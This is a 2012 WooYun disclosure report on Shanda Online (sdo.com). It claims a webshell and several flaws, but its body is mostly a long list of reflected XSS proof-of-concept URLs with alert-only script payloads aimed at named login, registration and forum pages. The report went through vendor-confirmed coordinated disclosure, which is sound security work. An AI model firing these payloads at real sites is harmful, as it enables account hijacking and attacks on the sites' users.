盛大在线漏洞集合已拿到webshell，不方便进一步提权。

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-07510

漏洞标题：盛大在线漏洞集合已拿到webshell，不方便进一步提权。

漏洞作者： zeracker

提交时间：2012-05-25 05:03

修复时间：2012-07-09 05:04

公开时间：2012-07-09 05:04

漏洞类型：账户体系控制不严

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-05-25：细节已通知厂商并且等待厂商处理中
2012-05-25：厂商已经确认，细节仅向厂商公开
2012-06-04：细节向核心白帽子及相关领域专家公开
2012-06-14：细节向普通白帽子公开
2012-06-24：细节向实习白帽子公开
2012-07-09：细节向公众公开

简要描述：

感谢木木童鞋晚上一起出去喝可乐，喝醉后，暴走了。。
--------------------------------------------------
盛大在线漏洞集合已拿到webshell，不方便进一步提权。
存在大量脚本跨站漏洞
url跳转漏洞
权限绕过
弱口令
后台暴漏
报错
上传页面
遍历漏洞
等等。。
如果要送礼物就送双份哈。嘎嘎嘎。。

详细说明：

http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId='"><script>alert(2037769);</script><"&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid='"><script>alert(5144459);</script><"&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx='"><script>alert(1556958);</script><"&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid='"><script>alert(4662558);</script><"&appArea=1&service=http://iq.sdo.com&code=2&pageType=0&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrameFC.php?appId=207&areaId=1&loginifrmId=iframeLogin&proxyUrl=http://www.sdo.com/proxy.html&returnURL=http://iq.sdo.com&backUrl=http://iq.sdo.com&CSSURL=http://iq.sdo.com/Style/IframeLogin.css&username=&password=&templateId=&sdid=&infoEx=&uid=&appArea=1&service=http://iq.sdo.com&code=2&pageType='"><script>alert(4127734);</script><"&autoLogin=0&saveTime=14&loginCustomerUrl=http://login.sdo.com/sdo/Login/LoginSDO.php?service=http://iq.sdo.com&encryptFlag=0
http://app.help.sdo.com/sdohelp.ashx?gameid=200012500&area=4000&type=3&maxlen=10&maxnum=4&src='"><script>alert(9968761);</script><"&ver=0
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone='"><script>alert(6504626);</script><"
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType='"><script>alert(8684335);</script><"®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid='"><script>alert(5536731);</script><"&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://cy.sdo.com/bbs/?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287161522%29%3B%3C/script%3E&cookietime=2592000
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid='"><script>alert(8207517);</script><"&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001='"><script>alert(7736705);</script><"&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002='"><script>alert(5674032);</script><"&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001='"><script>alert(1022590);</script><"&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002='"><script>alert(0541698);</script><"&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck='"><script>alert(5374185);</script><"&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom='"><script>alert(3302573);</script><"&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone='"><script>alert(0268717);</script><"&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid='"><script>alert(9291599);</script><"&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype='"><script>alert(4401657);</script><"&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner='"><script>alert(3207573);</script><"&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype='"><script>alert(0399132);</script><"&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent='"><script>alert(1523222);</script><"&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype='"><script>alert(3169019);</script><"&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
https://cas.sdo.com/cas/loginStateService?method='"><script>alert(5794917);</script><"
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo='"><script>alert(4349020);</script><"&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId='"><script>alert(6740555);</script><"&appArea=0&returnURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&CSSURL=http%3A%2F%2Fwww.tuita.com%2Fhtml%2Flogin%2Fcss%2FIframeLogin.css%3F20150524184201&autologinchecked=1&autologintime=14&autologintext=%E4%B8%8B%E6%AC%A1%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95&autologinwaitingmsg=%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E4%B8%AD...&curURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&usernamePlaceHolder=%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%2F%E4%B8%AA%E6%80%A7%E5%8C%96%E5%B8%90%E5%8F%B7
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount='"><script>alert(1806599);</script><"&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea='"><script>alert(2257886);</script><"&returnURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&CSSURL=http%3A%2F%2Fwww.tuita.com%2Fhtml%2Flogin%2Fcss%2FIframeLogin.css%3F20150524184201&autologinchecked=1&autologintime=14&autologintext=%E4%B8%8B%E6%AC%A1%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95&autologinwaitingmsg=%E8%87%AA%E5%8A%A8%E7%99%BB%E5%BD%95%E4%B8%AD...&curURL=http%3A%2F%2Fwww.tuita.com%2Flogin%3Frefer%3D&usernamePlaceHolder=%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%2F%E4%B8%AA%E6%80%A7%E5%8C%96%E5%B8%90%E5%8F%B7
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2='"><script>alert(8264758);</script><"&showPTInfoSection=&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection='"><script>alert(1415861);</script><"&vendorPhoneId=&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId='"><script>alert(3646133);</script><"&modelPhoneId=
http://register.sdo.com/gaea/phone_default.aspx?from=121&zone=nav&ptType=2®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=nav&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&attcode2=123456&showPTInfoSection=&vendorPhoneId=&modelPhoneId='"><script>alert(7313563);</script><"
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId='"><script>alert(5504003);</script><"&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
https://cas.sdo.com/cas/login?service='"><script>alert(1926402);</script><"&gateway=true
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid='"><script>alert(3542305);</script><"&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx='"><script>alert(6112296);</script><"&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid='"><script>alert(1535785);</script><"&service=http://www.tuita.com/login?refer=&code=2&pageType=0&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://login.sdo.com/sdo/Login/LoginFrame.php?appDomain=tuita.com&appId=256&appArea=0&returnURL=http://www.tuita.com/login?refer=&CSSURL=http://www.tuita.com/html/login/css/IframeLogin.css?20150524184201&autologinchecked=1&autologintime=14&autologintext=涓嬫鑷姩鐧诲綍&autologinwaitingmsg=鑷姩鐧诲綍涓�...&curURL=http://www.tuita.com/login?refer=&usernamePlaceHolder=鎵嬫満/閭/涓€у寲甯愬彿&username=&password=&templateId=&sdid=&infoEx=&uid=&service=http://www.tuita.com/login?refer=&code=2&pageType='"><script>alert(6920369);</script><"&autoLogin=&saveTime=14&loginCustomerUrl=http://www.tuita.com/login?refer=&encryptFlag=0
http://jf.sdo.com/Partner/PromotionList.aspx?type='"><script>alert(3820307);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11690?queryString='"><script>alert(6392999);</script><"&idx=11690
http://lt.abc.sdo.com/knowledge/ClassShow/11689?queryString='"><script>alert(8150974);</script><"&idx=11689
http://lt.abc.sdo.com/knowledge/ClassShow/11690?queryString=1&idx='"><script>alert(7444296);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11688?queryString='"><script>alert(7444296);</script><"&idx=11688
http://lt.abc.sdo.com/knowledge/ClassShow/11687?queryString='"><script>alert(6400969);</script><"&idx=11687
http://lt.abc.sdo.com/knowledge/ClassShow/11695?queryString='"><script>alert(2856795);</script><"&idx=11695
http://lt.abc.sdo.com/knowledge/ClassShow/11689?queryString=1&idx='"><script>alert(6953485);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11688?queryString=1&idx='"><script>alert(1265984);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11695?queryString=1&idx='"><script>alert(1265984);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11687?queryString=1&idx='"><script>alert(8689273);</script><"
http://lt.abc.sdo.com/knowledge/ClassShow/11693?queryString='"><script>alert(8689273);</script><"&idx=11693
http://lt.abc.sdo.com/knowledge/ClassShow/11693?queryString=1&idx='"><script>alert(7152569);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/12569?queryString='"><script>alert(0805996);</script><"&idx=12569
http://ga.abc.sdo.com/knowledge/ClassShow/12569?queryString=1&idx=';</script><script>alert(0805996);</script>
http://ga.abc.sdo.com/knowledge/ClassShow/11578?queryString='"><script>alert(2240958);</script><"&idx=11578
http://ga.abc.sdo.com/knowledge/ClassShow/11583?queryString='"><script>alert(5647584);</script><"&idx=11583
http://ga.abc.sdo.com/knowledge/ClassShow/11584?queryString=1&idx='"><script>alert(9843284);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/11578?queryString=1&idx='"><script>alert(1950983);</script><"
http://ga.abc.sdo.com/knowledge/ClassShow/11583?queryString=1&idx='"><script>alert(3686881);</script><"
http://register.sdo.com/gaea/input_pt.aspx?from=121&zone='"><script>alert(6215670);</script><"
http://register.sdo.com/gaea/phone_overseas.aspx?from='"><script>alert(2192155);</script><"&zone=nav
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone='"><script>alert(0314432);</script><"
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType='"><script>alert(9646418);</script><"®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid='"><script>alert(8079841);</script><"&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid='"><script>alert(1210537);</script><"&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001='"><script>alert(2465525);</script><"&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002='"><script>alert(9923001);</script><"&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001='"><script>alert(5280583);</script><"&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002='"><script>alert(3117847);</script><"&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck='"><script>alert(2649984);</script><"&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom='"><script>alert(9053711);</script><"&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone='"><script>alert(7347684);</script><"&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid='"><script>alert(4972556);</script><"&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype='"><script>alert(5027418);</script><"&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner='"><script>alert(2585428);</script><"&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype='"><script>alert(4100227);</script><"&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent='"><script>alert(1049614);</script><"&ctype=&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype='"><script>alert(3785412);</script><"&hidExinfo=&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo='"><script>alert(2769998);</script><"&qqaccount=&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount='"><script>alert(9116294);</script><"&showPTInfoSection=
http://register.sdo.com/gaea/phone_overseas.aspx?from=121&zone=nav&ptType=1®sdid=&chksdid=false&hidRecName001=&hidRecName002=&hidRecRule001=&hidRecRule002=&agent4IpCheck=checkIp&txtRegisterFrom=121&txtRegisterZone=&sessionid=&goldtype=&partner=&apptype=&agent=&ctype=&hidExinfo=&qqaccount=&showPTInfoSection='"><script>alert(6583770);</script><"
http://cy.sdo.com/bbs/index.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%287151867%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/register.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%282564266%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/memcp.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%285235041%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/medal.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%283273439%29%3B%3C/script%3E&cookietime=2592000
http://cy.sdo.com/bbs/stats.php?formhash=ba4a947f&referer=%22%3E%3Cscript%3Ealert%286380139%29%3B%3C/script%3E&cookietime=2592000
